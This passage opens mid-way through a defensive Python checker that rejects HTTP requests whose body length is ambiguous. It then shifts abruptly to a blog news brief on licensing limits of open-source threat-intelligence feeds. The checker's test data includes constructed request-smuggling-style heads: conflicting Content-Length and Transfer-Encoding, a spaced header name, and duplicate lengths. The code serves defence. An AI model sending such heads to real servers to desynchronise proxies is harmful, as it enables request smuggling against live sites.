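            raise AmbiguousFraming(f"non-numeric Content-Length {cl[0]!r}")
        return f"length:{int(cl[0])}"
    return "none"

def audit(raw: bytes):
    """Convenience wrapper returning (accepted, framing_or_reason)."""
    try:
        return True, body_framing(raw)
    except (AmbiguousFraming, ValueError) as exc:
        return False, str(exc)

if __name__ == "__main__":
    # Constructed sample request heads, not captured traffic.
    samples = {
        "plain":      b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n\r\nhello",
        "chunked":    b"POST /api HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
        "cl_and_te":  b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n",
        "space_name": b"POST /api HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding : chunked\r\n\r\n",
        "dup_cl":     b"POST /api HTTP/1.1\r\nHost: example.test\r\nContent-Length: 4\r\nContent-Length: 6\r\n\r\n",
    }
    for label, req in samples.items():
        print(f"{label:11} -> {audit(req)}")
```

The point of the check is not to model every parser quirk but to refuse any head on which two reasonable parsers could disagree; a message that is rejected at the edge with a 400 and a closed connection can never desynchronise the proxy from the origin. The same rules are the reason HTTP/2, which carries the body length in frames rather than headers, is safer end-to-end than the HTTP/2-to-HTTP/1.1 downgrade that many front ends still perform.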
Open Source Threat Intelligence - Not As Open As You'd Think
An article by three security researchers from Samsung Research in IEEE Security & Privacy points out that we should be wary of licensing conditions on open-source threat intelligence feeds. In many cases, the information is provided for personal, informational and research purposes only, and in some cases, the site or feed has no licence information or terms of service at all - in which case, no-one can use, copy, modify or distribute the information. In other cases, the meaning of terms like commercial use is unclear, making use risky.
Shim, WooChul, Hyejin Shin and Yong Ho Hwang, On Data Licenses for Open Source Threat Intelligence, IEEE Security & Privacy, Vol 20 No. 4, July/August 2022, pp. 8 - 22. Digital Object Identifier 10.1109/MSEC.2021.3127218.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.